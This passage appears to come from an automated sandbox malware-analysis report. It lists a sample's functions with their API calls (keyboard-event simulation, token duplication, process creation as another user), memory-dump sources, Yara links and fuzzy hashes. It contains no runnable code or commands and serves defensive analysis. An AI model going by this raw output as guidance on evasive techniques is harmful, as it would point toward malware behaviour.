                                                                            • KiUserCallbackDispatcher.NTDLL(00002000,00000000,0040D89F,00000000,?,?,0040D89F,001B2EB8), ref: 0040F386
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,0040D89F,001B2EB8), ref: 0040F39E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherInfoParametersSystemUser
                                                                            • String ID:
                                                                            • API String ID: 1232580896-0
                                                                            • Opcode ID: e8c90ec597a1944ae78b7ca20706975efaf7c61f5b7d6b196fc3d6e6037ce03d
                                                                            • Instruction ID: 65e1473dc04fc68897f4a965434dba24c69ef846d3a13abfb0e70c8142ecb83e
                                                                            • Opcode Fuzzy Hash: e8c90ec597a1944ae78b7ca20706975efaf7c61f5b7d6b196fc3d6e6037ce03d
                                                                            • Instruction Fuzzy Hash: F2E0EC727953107AF21486408C46F56A7989B44B11F10C51AB7059B1C1C6F0A840CB95
                                                                            Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                            Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                            • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                            • Opcode Fuzzy Hash: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                            • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                            Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                            • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                            • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                            • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                            Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHeap
                                                                            • String ID:
                                                                            • API String ID: 10892065-0
                                                                            • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                            • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                            • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                            • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                            Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001), ref: 004442F3
                                                                            • WriteFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00444362
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: File$PointerWrite
                                                                            • String ID:
                                                                            • API String ID: 539440098-0
                                                                            • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                            • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                            • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                            • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                            Function 004113E5 Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041181B: __lock.LIBCMT ref: 0041181D
                                                                            • __onexit_nolock.LIBCMT ref: 004113FD
                                                                              • Part of subcall function 004112FA: __decode_pointer.LIBCMT ref: 00411309
                                                                              • Part of subcall function 004112FA: __decode_pointer.LIBCMT ref: 00411319
                                                                              • Part of subcall function 004112FA: __msize.LIBCMT ref: 00411337
                                                                              • Part of subcall function 004112FA: __realloc_crt.LIBCMT ref: 0041135B
                                                                              • Part of subcall function 004112FA: __realloc_crt.LIBCMT ref: 00411371
                                                                              • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 00411383
                                                                              • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 00411391
                                                                              • Part of subcall function 004112FA: __encode_pointer.LIBCMT ref: 0041139C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                                                                            • String ID:
                                                                            • API String ID: 1316407801-0
                                                                            • Opcode ID: d4f7479c18d2f3dc105ebfe0f2eac5810891221413fa193614bbe2c2ae41d224
                                                                            • Instruction ID: 67ef268c6cd115d101ef856db97c2ea624f8e5cc5d3a941a6f1fba9d4c5b72b9
                                                                            • Opcode Fuzzy Hash: d4f7479c18d2f3dc105ebfe0f2eac5810891221413fa193614bbe2c2ae41d224
                                                                            • Instruction Fuzzy Hash: 07D01731901205AACB00FFAAD8067CC76706F04318F20819AB114662E2CB3C46C19A18
                                                                            Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                            • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                            • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                            • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                            Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wfsopen
                                                                            • String ID:
                                                                            • API String ID: 197181222-0
                                                                            • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                            • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                            • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                            • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                            Function 004169E0 Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __encode_pointer.LIBCMT ref: 004169E2
                                                                              • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416980
                                                                              • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000003,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416997
                                                                              • Part of subcall function 0041696E: RtlEncodePointer.NTDLL(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 004169D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$EncodePointer__encode_pointer
                                                                            • String ID:
                                                                            • API String ID: 2585649348-0
                                                                            • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                            • Instruction ID: f62f3284a010ca3bbb159d13ec07db3ba5ef3bb17cb580217ffea2be35a92f46
                                                                            • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                            • Instruction Fuzzy Hash:
                                                                            Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 0040D91D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                            • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                            • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                            • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                            Function 03A45418 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 03A45429
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429781740.0000000003A43000.00000040.00000020.00020000.00000000.sdmp, Offset: 03A43000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3a43000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: 64173c586354ceaf4db57c06e034091a5fafdfafe18755040516d4587c0eb90d
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: FBE0E67498010DDFDB00DFB9D54969D7BB4EF04302F1041A1FD01D6280D6309D508A62

                                                                            Non-executed Functions

                                                                            Function 004045E0 Relevance: 81.9, Strings: 63, Instructions: 3193COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                                                            • API String ID: 0-4260964411
                                                                            • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                            • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                            • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                            • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                            Function 0047C08E Relevance: 77.7, APIs: 40, Strings: 4, Instructions: 676windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                            • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                            • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                            • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                            • SendMessageW.USER32 ref: 0047C2FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$State$LongProcWindow
                                                                            • String ID: @GUI_DRAGID$@+$F$X+
                                                                            • API String ID: 1562745308-269343827
                                                                            • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                            • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                            • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                            • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                            Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 004375B3
                                                                            • FindWindowW.USER32 ref: 004375D8
                                                                            • IsIconic.USER32(?), ref: 004375E1
                                                                            • ShowWindow.USER32(?,00000009), ref: 004375EE
                                                                            • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                            • GetCurrentThreadId.KERNEL32(?,?,004448AF,?), ref: 00437619
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437632
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437638
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043763E
                                                                            • SetForegroundWindow.USER32(?), ref: 00437645
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                            • keybd_event.USER32 ref: 0043765D
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                            • keybd_event.USER32 ref: 00437674
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                            • keybd_event.USER32 ref: 0043768B
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                            • keybd_event.USER32 ref: 004376A2
                                                                            • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376CD
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376D3
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 3778422247-2988720461
                                                                            • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                            • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                            • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                            • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                            Function 004461ED Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 227processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0044621B
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                            • CloseHandle.KERNEL32(?), ref: 0044628A
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                            • GetProcessWindowStation.USER32 ref: 004462BD
                                                                            • SetProcessWindowStation.USER32 ref: 004462C8
                                                                            • OpenDesktopW.USER32 ref: 004462E4
                                                                            • _wcslen.LIBCMT ref: 0044639E
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • _wcsncpy.LIBCMT ref: 004463C7
                                                                            • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                            • CreateProcessAsUserW.ADVAPI32 ref: 00446446
                                                                            • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                            • CloseWindowStation.USER32(00000000), ref: 00446497
                                                                            • CloseDesktop.USER32 ref: 0044649E
                                                                            • SetProcessWindowStation.USER32 ref: 004464A9
                                                                            • CloseHandle.KERNEL32(?), ref: 004464B4
                                                                            • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
